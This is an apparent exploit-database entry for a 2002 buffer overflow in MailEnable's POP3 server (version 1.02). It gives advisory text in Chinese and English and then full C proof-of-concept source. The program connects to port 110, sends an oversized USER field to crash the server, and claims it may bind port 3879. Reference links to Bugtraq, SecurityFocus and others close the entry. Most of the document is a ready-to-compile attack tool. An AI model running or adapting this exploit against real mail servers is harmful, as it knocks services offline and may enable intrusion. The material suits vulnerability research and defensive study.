https://www.exploit-db.com/exploits/22023
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-207

MailEnable是一款基于WEB的邮件服务程序。MailEnablePOP3服务器对用户登录字段数据缺少正确检查，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以POP3进程权限在系统上执行任意指令。攻击者可以连接有此漏洞的MailEnablePOP3服务程序，并在USER提示字段输入超长的字符串，可触发缓冲区溢出，精心构建提交数据可能以POP3进程权限在系统上执行任意指令。

source: http://www.securityfocus.com/bid/6197/info

A buffer overflow vulnerability has been reported for MailEnable's POP3 server. The vulnerability is due to insufficent bounds checking of the USER login field.

An attacker can exploit this vulnerability by connecting to a vulnerable MailEnable server and sending an overly long string as the value for the USER login prompt. This will trigger the buffer overflow condition. 

/*
*
* Written by redsand
* <[email protected]>
* Vuln. date found: November 18. 2002
* Vulnerable: Windows 9x/NT/XP MailEnable POP Server Version 1.02
*
* Usage: ./mailenable-dos.1.3 <host> [port] [port] is optional. default is in the #define (port 110)
* Need to Enable [offset] in final release.
*
* Proof of Concept code (PoC)
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 110

char string[2010];
char death[2500];
char top[5], end[50];
char tag[] = "::redsand.net::";

int main(int argc, char *argv[]) {

  int sockfd, port, i;
  char buf[2500];
  struct hostent *ha;
  struct sockaddr_in sa;
  if (argc < 2 ) {
printf("MailEnable POP Server Version 1.02 DoSn:: redsand <at> redsand.netrnUsage: %s <host> <port>n", argv[0]);
    exit(0);
  }
if (argv[2]) {
port = atoi(argv[2]);
} else { port = PORT; }
for( i = 0; i <2009; i++) {
string[i] = 'A';
}

strcpy(top,"USER ");
strcpy(end,tag);
strcpy(death,top);
strcat(death,string);
strcat(death,end);

  if (!(ha = gethostbyname (argv[1])))
    perror ("gethostbyname");

  bzero (&sa, sizeof (sa));
  bcopy (ha->h_addr, (char *) &sa.sin_addr, ha->h_length);
  sa.sin_family = ha->h_addrtype;
  sa.sin_port = htons (port);

  if ((sockfd = socket (ha->h_addrtype, SOCK_STREAM, 0)) < 0) {
    perror ("socket");
    exit (1);
  }
 printf("MailEnable :: redsand <at> redsand.netrn+ connecting...n");
  if (connect (sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    perror ("connect");
    exit (1);
  }
  printf("+ connectedn+ sending request to pop3 servern");
  send(sockfd, death, sizeof(death), 0);
  // read(sockfd, buf, 2050, 0);
    close(sockfd);
  printf("+ finishedn");
  printf("rrIf exploit worked, then it should bind port on 3879n");
}

/* redsand.net */

来源:BID
名称:6197
链接:http://www.securityfocus.com/bid/6197
来源:XF
名称:mailenable-pop3-server-dos(10652)
链接:http://www.iss.net/security_center/static/10652.php
来源:BUGTRAQ
名称:20021117MailEnablePOP3Serverremoteshutdown!:/-newest~(andprevious)bufferoverflow-
链接:http://archives.neohapsis.com/archives/bugtraq/2002-11/0236.html
来源：NSFOCUS
名称：3860
链接：http://www.nsfocus.net/vulndb/3860